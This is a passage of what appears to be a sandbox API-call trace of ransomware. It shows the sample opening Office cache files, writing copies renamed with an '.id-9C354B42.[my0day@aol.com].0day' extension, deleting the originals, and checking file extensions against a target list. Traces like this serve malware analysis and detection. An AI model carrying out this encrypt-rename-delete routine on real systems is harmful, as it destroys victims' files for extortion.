1 [0034.753] ReadFile (in: hFile=0x1a0, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.753] WriteFile (in: hFile=0x1a8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xee, lpOverlapped=0x0) returned 1 [0034.753] SetEndOfFile (hFile=0x1a8) returned 1 [0034.753] CloseHandle (hObject=0x1a8) returned 1 [0034.754] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.754] SetEndOfFile (hFile=0x1a0) returned 1 [0034.754] CloseHandle (hObject=0x1a0) returned 1 [0034.754] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.755] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml")) returned 1 [0034.755] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.755] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.756] lstrlenW (lpString=".doc") returned 4 [0034.756] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.756] lstrlenW (lpString=".docx") returned 5 [0034.756] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.756] lstrlenW (lpString=".pdf") returned 4 [0034.756] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.756] lstrlenW (lpString=".xls") returned 4 [0034.756] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.756] lstrlenW (lpString=".xlsx") returned 5 [0034.756] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.756] lstrlenW (lpString=".ppt") returned 4 [0034.756] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.756] lstrlenW (lpString=".zip") returned 4 [0034.756] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.756] lstrlenW (lpString=".rar") returned 4 [0034.756] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.756] lstrlenW (lpString=".bz2") returned 4 [0034.756] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.756] lstrlenW (lpString=".7z") returned 3 [0034.756] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.756] lstrlenW (lpString=".dbf") returned 4 [0034.756] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.756] lstrlenW (lpString=".1cd") returned 4 [0034.756] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.756] lstrlenW (lpString=".jpg") returned 4 [0034.756] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.756] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.756] lstrlenW (lpString=".doc") returned 4 [0034.756] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.757] lstrlenW (lpString=".docx") returned 5 [0034.757] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0034.757] lstrlenW (lpString=".pdf") returned 4 [0034.757] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.757] lstrlenW (lpString=".xls") returned 4 [0034.757] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.757] lstrlenW (lpString=".xlsx") returned 5 [0034.757] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0034.757] lstrlenW (lpString=".ppt") returned 4 [0034.757] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.757] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.757] lstrlenW (lpString=".zip") returned 4 [0034.757] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.757] lstrlenW (lpString=".rar") returned 4 [0034.757] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.757] lstrlenW (lpString=".bz2") returned 4 [0034.757] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.757] lstrlenW (lpString=".7z") returned 3 [0034.757] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.757] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.757] lstrlenW (lpString=".dbf") returned 4 [0034.757] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.757] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.757] lstrlenW (lpString=".1cd") returned 4 [0034.757] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.757] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 76 [0034.757] lstrlenW (lpString=".jpg") returned 4 [0034.757] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.757] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.757] lstrlenW (lpString="Setup.xml") returned 9 [0034.758] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.758] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1452) returned 1 [0034.758] CloseHandle (hObject=0x1a0) returned 1 [0034.758] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0034.758] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.758] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.758] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.758] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.758] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0034.758] GetLastError () returned 0x0 [0034.759] ReadFile (in: hFile=0x1a0, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x5ac, lpOverlapped=0x0) returned 1 [0034.760] WriteFile (in: hFile=0x1a8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0034.761] ReadFile (in: hFile=0x1a0, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.761] WriteFile (in: hFile=0x1a8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.761] SetEndOfFile (hFile=0x1a8) returned 1 [0034.761] CloseHandle (hObject=0x1a8) returned 1 [0034.762] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.762] SetEndOfFile (hFile=0x1a0) returned 1 [0034.762] CloseHandle (hObject=0x1a0) returned 1 [0034.763] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0034.763] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.763] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.763] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.763] lstrlenW (lpString=".doc") returned 4 [0034.763] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.763] lstrlenW (lpString=".docx") returned 5 [0034.763] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.763] lstrlenW (lpString=".pdf") returned 4 [0034.763] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.763] lstrlenW (lpString=".xls") returned 4 [0034.763] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.763] lstrlenW (lpString=".xlsx") returned 5 [0034.763] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.763] lstrlenW (lpString=".ppt") returned 4 [0034.763] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.763] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.763] lstrlenW (lpString=".zip") returned 4 [0034.763] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.763] lstrlenW (lpString=".rar") returned 4 [0034.763] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.764] lstrlenW (lpString=".bz2") returned 4 [0034.764] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.764] lstrlenW (lpString=".7z") returned 3 [0034.764] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.764] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.764] lstrlenW (lpString=".dbf") returned 4 [0034.764] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.764] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.764] lstrlenW (lpString=".1cd") returned 4 [0034.764] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.764] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.764] lstrlenW (lpString=".jpg") returned 4 [0034.764] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.764] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.764] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.764] lstrlenW (lpString=".doc") returned 4 [0034.764] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.764] lstrlenW (lpString=".docx") returned 5 [0034.764] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.764] lstrlenW (lpString=".pdf") returned 4 [0034.764] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.764] lstrlenW (lpString=".xls") returned 4 [0034.764] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.764] lstrlenW (lpString=".xlsx") returned 5 [0034.764] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.764] lstrlenW (lpString=".ppt") returned 4 [0034.764] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.764] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.764] lstrlenW (lpString=".zip") returned 4 [0034.764] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.765] lstrlenW (lpString=".rar") returned 4 [0034.765] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.765] lstrlenW (lpString=".bz2") returned 4 [0034.765] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.765] lstrlenW (lpString=".7z") returned 3 [0034.765] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.765] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.765] lstrlenW (lpString=".dbf") returned 4 [0034.765] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.765] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.765] lstrlenW (lpString=".1cd") returned 4 [0034.765] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.765] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.765] lstrlenW (lpString=".jpg") returned 4 [0034.765] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.765] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0034.765] lstrlenW (lpString="branding.xml") returned 12 [0034.765] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.767] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=596341) returned 1 [0034.767] CloseHandle (hObject=0x1a0) returned 1 [0034.767] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml")) returned 0x2020 [0034.767] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0034.767] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0034.767] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.768] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.768] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0034.768] GetLastError () returned 0x0 [0034.768] ReadFile (in: hFile=0x1a0, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x91975, lpOverlapped=0x0) returned 1 [0034.781] WriteFile (in: hFile=0x1a8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x91980, lpOverlapped=0x0) returned 1 [0035.012] ReadFile (in: hFile=0x1a0, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.012] WriteFile (in: hFile=0x1a8, lpBuffer=0x34c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x34c0020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0035.012] SetEndOfFile (hFile=0x1a8) returned 1 [0035.012] CloseHandle (hObject=0x1a8) returned 1 [0035.517] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.517] SetEndOfFile (hFile=0x1a0) returned 1 [0035.626] CloseHandle (hObject=0x1a0) returned 1 [0035.626] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0035.626] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml")) returned 1 [0035.626] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.626] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.626] lstrlenW (lpString=".doc") returned 4 [0035.626] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.626] lstrlenW (lpString=".docx") returned 5 [0035.626] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0035.626] lstrlenW (lpString=".pdf") returned 4 [0035.626] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.626] lstrlenW (lpString=".xls") returned 4 [0035.626] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.626] lstrlenW (lpString=".xlsx") returned 5 [0035.627] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0035.627] lstrlenW (lpString=".ppt") returned 4 [0035.627] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.627] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.627] lstrlenW (lpString=".zip") returned 4 [0035.627] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.627] lstrlenW (lpString=".rar") returned 4 [0035.627] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.627] lstrlenW (lpString=".bz2") returned 4 [0035.627] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.627] lstrlenW (lpString=".7z") returned 3 [0035.627] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.627] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.627] lstrlenW (lpString=".dbf") returned 4 [0035.627] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.627] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.627] lstrlenW (lpString=".1cd") returned 4 [0035.627] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.627] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.627] lstrlenW (lpString=".jpg") returned 4 [0035.627] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.627] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.627] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.627] lstrlenW (lpString=".doc") returned 4 [0035.627] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.627] lstrlenW (lpString=".docx") returned 5 [0035.627] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0035.627] lstrlenW (lpString=".pdf") returned 4 [0035.627] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.627] lstrlenW (lpString=".xls") returned 4 [0035.627] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.627] lstrlenW (lpString=".xlsx") returned 5 [0035.627] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0035.628] lstrlenW (lpString=".ppt") returned 4 [0035.628] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.628] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.628] lstrlenW (lpString=".zip") returned 4 [0035.628] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.628] lstrlenW (lpString=".rar") returned 4 [0035.628] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.628] lstrlenW (lpString=".bz2") returned 4 [0035.628] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.628] lstrlenW (lpString=".7z") returned 3 [0035.628] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.628] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.628] lstrlenW (lpString=".dbf") returned 4 [0035.628] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.628] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.628] lstrlenW (lpString=".1cd") returned 4 [0035.628] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.628] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 75 [0035.628] lstrlenW (lpString=".jpg") returned 4 [0035.628] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.628] lstrcmpiW (lpString1=".xml", lpString2=".0day") returned 1 [0035.628] lstrlenW (lpString="AccessMUI.xml") returned 13 [0035.628] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.708] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=1349) returned 1 [0035.708] CloseHandle (hObject=0x1a0) returned 1 [0035.708] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml")) returned 0x2020 [0035.708] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0035.708] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.708] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.708] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.708] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0035.709] GetLastError () returned 0x0 [0035.709] ReadFile (in: hFile=0x1a0, lpBuffer=0x34c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, 